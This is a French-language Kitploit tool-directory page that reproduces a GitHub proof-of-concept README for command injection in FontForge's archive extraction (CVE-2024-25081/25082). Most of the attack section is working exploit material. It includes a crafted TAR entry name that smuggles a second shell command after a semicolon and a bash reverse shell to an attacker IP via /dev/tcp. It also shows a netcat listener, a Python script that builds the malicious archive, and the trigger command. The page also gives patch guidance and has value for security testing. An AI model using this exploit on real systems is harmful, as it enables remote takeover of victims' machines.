Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-25082_CVE-2024-25081 — Vulnérabilité d'injection de commandes via un nom de fichier contrefait dans FontForge Splinefont | Kitploit
Outils/GitHubGitHub/alielkhatteb/cve-2024-25082_cve-2024-25081
Génération de PayloadsAnalyse des VulnérabilitésExploitationTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHubalielkhatteb/cve-2024-25082_cve-2024-25081

CVE-2024-25082_CVE-2024-25081

Vulnérabilité d'injection de commandes via un nom de fichier contrefait dans FontForge Splinefont

Voir le dépôt
13il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

⚠️ FontForge RCE — CVE-2024-25081 & CVE-2024-25082 - PoC

📖 Aperçu

Exploit de preuve de concept pour deux vulnérabilités d'injection de commandes dans FontForge ≤ 20230101 (composant Splinefont).

CVEVecteurDéclencheur
CVE-2024-25081Nom de fichier fabriquéOuverture directe de fichier
CVE-2024-25082Nom de fichier d'archive fabriquéExtraction TAR/ZIP/GZ/BZ2

Ce PoC cible CVE-2024-25082 — L'extraction automatique d'archive de FontForge transmet les noms de fichiers à un shell sans assainissement, permettant à une charge utile délimitée par un point-virgule intégrée dans un nom d'entrée TAR d'exécuter des commandes arbitraires.


Fonctionnement

FontForge prend en charge l'ouverture de fichiers de polices directement depuis les archives. Lors de l'extraction d'une archive TAR, le composant Splinefont construit une commande shell en utilisant le nom de fichier de l'entrée d'archive. Comme le nom de fichier n'est pas assaini, un point-virgule (;) dans le nom de l'entrée sort de la commande attendue et injecte des instructions shell arbitraires.

Nom d'entrée TAR malveillant :

root@kitploit:~
exploit.ttf;bash /tmp/s.sh;

Lorsque FontForge traite cette archive, le shell interprète cela comme :

root@kitploit:~
<extract command> exploit.ttf ; bash /tmp/s.sh ; 

Environnement

  • Logiciel vulnérable : FontForge ≤ 20230101
  • Plateforme : Linux
  • Écouteur attaquant : 192.168.1.20:4444 (ajuster si nécessaire)

📋 Prérequis

  • Python 3 (bibliothèque standard uniquement, module tarfile)
  • netcat sur la machine attaquante
  • FontForge ≤ 20230101 sur la machine cible

🛠️ Preuve de concept

1. Démarrer un écouteur netcat sur la machine attaquante

root@kitploit:~
nc -lvnp 4444

2. Générer l'archive TAR malveillante

root@kitploit:~
# Écrire la charge utile du reverse shell
echo 'bash -i >& /dev/tcp/192.168.1.20/4444 0>&1' > /tmp/s.sh
chmod +x /tmp/s.sh

# Construire l'archive malveillante
python3 << 'EOF'
import tarfile, io

malicious_name = "exploit.ttf;bash /tmp/s.sh;"
tar = tarfile.open("exploit.tar", "w")
info = tarfile.TarInfo(name=malicious_name)
info.size = 4
tar.addfile(info, io.BytesIO(b"AAAA"))
tar.close()
print("done")
EOF

3. Ouvrir l'archive dans FontForge sur la cible

root@kitploit:~
fontforge exploit.tar

Un reverse shell se connectera à votre écouteur.


🔒 Correctif

Corrigé dans FontForge après 20230101 via PR #5367. Mettre à jour vers la dernière version.

  • Debian/Ubuntu : sudo apt upgrade fontforge
  • Construction manuelle : tirer la dernière version de fontforge/fontforge

🔍 Références

  • NVD — CVE-2024-25081
  • NVD — CVE-2024-25082
  • Correctif FontForge PR #5367

⚖️ Avertissement et conditions

Ce code de preuve de concept (PoC) est fourni à des fins éducatives et de tests de pénétration autorisés uniquement.

  • Aucune autorisation n'est accordée pour modifier, redistribuer ou utiliser ce code à d'autres fins.
  • L'utilisation ou la modification non autorisée peut être illégale et contraire à l'éthique.
  • Les auteurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages.
Télécharger l’outil